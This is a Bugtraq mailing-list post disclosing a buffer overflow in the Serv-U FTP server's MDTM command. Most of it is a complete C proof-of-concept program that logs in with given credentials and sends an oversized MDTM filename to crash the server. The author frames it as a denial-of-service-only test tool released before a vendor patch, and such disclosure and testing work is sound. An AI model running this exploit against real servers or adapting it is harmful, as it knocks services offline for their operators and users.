Hello Bugtraq, I have written a PoC exploit for the MDTM command buffer overflow found in Serv-U by bkbll. This exploit only crashes the Serv-U server, as releasing a arbitrary code execution exploit when the vendor has not yet supplied a patch/fix is not a good idea when certain unruly people might get their hands on it. Here it is, test your systems, temporarily disable Serv-U, and wait for the vendor to release a patch. ---START /* serv-u-mdtm-expl.c - Serv-U "MDTM" buffer overflow PoC DoS exploit. * * This program will send an overly large filename parameter when calling * the Serv-U FTP MDTM command. Although arbitrary code execution is * possible upon successful execution of this vulnerability, the vendor has * not yet released a patch, so releasing such an exploit could be disastrous * in the hands of script kiddies. I might release a full exploit to the * public when a patch/fix is issued by the vendor of Serv-U. This PoC * exploit will simply crash the Serv-U server. * * This vulnerability was discovered by bkbll, you can read his advisory on * the issue here: <http://www.cnhonker.com/advisory/serv-u.mdtm.txt> * * This vulnerability requires a valid login and password to exploit! This * PoC does not check to see if you supplied a correct login and password. * * I do not take responsibility for this code. * * -shaun2k2 */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netdb.h> #include <netinet/in.h> int main(int argc, char *argv[]) { if(argc < 5) { printf("Serv-U 'MDTM' buffer overflow DoS exploit.\n"); printf("by shaun2k2 - <shaunige@yahoo.co.uk>.\n\n"); printf("Usage: %s <host> <port> <login> <password>\n", argv[0]); exit(-1); } int sock; char *explbuf; char loginbuf[100]; char passwdbuf[100]; struct sockaddr_in dest; struct hostent *he; /* lookup IP address of supplied hostname. */ if((he = gethostbyname(argv[1])) == NULL) { printf("Couldn't resolve %s!\n", argv[1]); exit(-1); } /* create socket. */ if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket()"); exit(-1); } /* fill in address struct. */ dest.sin_family = AF_INET; dest.sin_port = htons(atoi(argv[2])); dest.sin_addr = *((struct in_addr *)he->h_addr); printf("Serv-U 'MDTM' buffer overflow DoS exploit.\n"); printf("by shaun2k2 - <shaunige@yahoo.co.uk>.\n\n"); printf("Crafting exploit buffer...\n\n"); /* craft exploit buffers. */ sprintf(loginbuf, "USER %s\n", argv[3]); sprintf(passwdbuf, "PASS %s\n", argv[4]); explbuf = "MDTM 20031111111111+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.txt"; printf("[+] Connecting...\n"); if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) < 0) { perror("connect()"); exit(-1); } printf("[+] Connected!\n\n"); printf("[+] Sending exploit buffers...\n"); sleep(1); /* give the serv-u server time to sort itself out. */ send(sock, loginbuf, strlen(loginbuf), 0); sleep(2); /* wait for 2 secs. */ send(sock, passwdbuf, strlen(passwdbuf), 0); sleep(2); /* wait before sending large MDTM command. */ send(sock, explbuf, strlen(explbuf), 0); sleep(1); /* wait before closing the socket. */ printf("[+] Exploit buffer sent!\n\n"); close(sock); printf("[+] Done! Check if the Serv-U server has crashed.\n"); return(0); } ---END I hope you find this useful in some way... Thank you for your time. Shaun. ___________________________________________________________ Yahoo! Messenger - Communicate instantly..."Ping" your friends today! Download Messenger Now http://uk.messenger.yahoo.com/download/index.html
